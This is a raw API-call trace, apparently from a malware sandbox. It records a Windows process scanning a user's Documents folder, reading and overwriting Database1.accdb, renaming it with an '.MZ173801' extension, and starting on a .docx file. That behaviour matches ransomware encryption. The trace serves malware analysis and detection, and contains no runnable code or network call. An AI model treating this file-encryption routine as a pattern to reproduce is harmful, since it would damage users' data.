lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.288] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.288] GetCurrentThreadId () returned 0x1358 [0121.288] GetCurrentThreadId () returned 0x1358 [0121.288] GetCurrentThreadId () returned 0x1358 [0121.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.289] GetCurrentThreadId () returned 0x1358 [0121.289] GetCurrentThreadId () returned 0x1358 [0121.289] GetCurrentThreadId () returned 0x1358 [0121.289] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.289] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.289] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.289] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x55000 [0121.289] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.290] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe50000 [0121.290] ReadFile (in: hFile=0x3fc, lpBuffer=0x7fe50010, nNumberOfBytesToRead=0x55000, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x7fe50010*, lpNumberOfBytesRead=0x19f9b0*=0x55000, lpOverlapped=0x0) returned 1 [0121.366] CloseHandle (hObject=0x3fc) returned 1 [0121.366] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fdf0000 [0121.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.384] WriteFile (in: hFile=0x3fc, lpBuffer=0x7fdf0010*, nNumberOfBytesToWrite=0x55000, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x7fdf0010*, lpNumberOfBytesWritten=0x19f9bc*=0x55000, lpOverlapped=0x0) returned 1 [0121.390] CloseHandle (hObject=0x3fc) returned 1 [0121.527] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.mz173801")) returned 1 [0121.528] VirtualFree (lpAddress=0x7fe50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.530] VirtualFree (lpAddress=0x7fdf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] GetCurrentThreadId () returned 0x1358 [0121.532] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.532] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.532] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.532] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xf3bc9010, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0xf3bc9010, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fhb23ambk-o", cAlternateFileName="FHB23A~1")) returned 1 [0121.532] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc089d0, ftCreationTime.dwHighDateTime=0x1d5b3ce, ftLastAccessTime.dwLowDateTime=0x45b4eca0, ftLastAccessTime.dwHighDateTime=0x1d571b2, ftLastWriteTime.dwLowDateTime=0x45b4eca0, ftLastWriteTime.dwHighDateTime=0x1d571b2, nFileSizeHigh=0x0, nFileSizeLow=0xc4ac, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fnu1ZEKDFkx.docx", cAlternateFileName="FNU1ZE~1.DOC")) returned 1 [0121.533] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.533] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fnu1ZEKDFkx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fnu1zekdfkx.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc089d0, ftCreationTime.dwHighDateTime=0x1d5b3ce, ftLastAccessTime.dwLowDateTime=0x45b4eca0, ftLastAccessTime.dwHighDateTime=0x1d571b2, ftLastWriteTime.dwLowDateTime=0x45b4eca0, ftLastWriteTime.dwHighDateTime=0x1d571b2, nFileSizeHigh=0x0, nFileSizeLow=0xc4ac)) returned 1 [0121.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.533] GetCurrentThreadId () returned 0x1358 [0121.533] GetCurrentThreadId () returned 0x1358 [0121.533] GetCurrentThreadId () returned 0x1358 [0121.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.534] GetCurrentThreadId () returned 0x1358 [0121.534] GetCurrentThreadId () returned 0x1358 [0121.534] GetCurrentThreadId () returned 0x1358 [0121.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fnu1ZEKDFkx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fnu1zekdfkx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.534] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.534] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 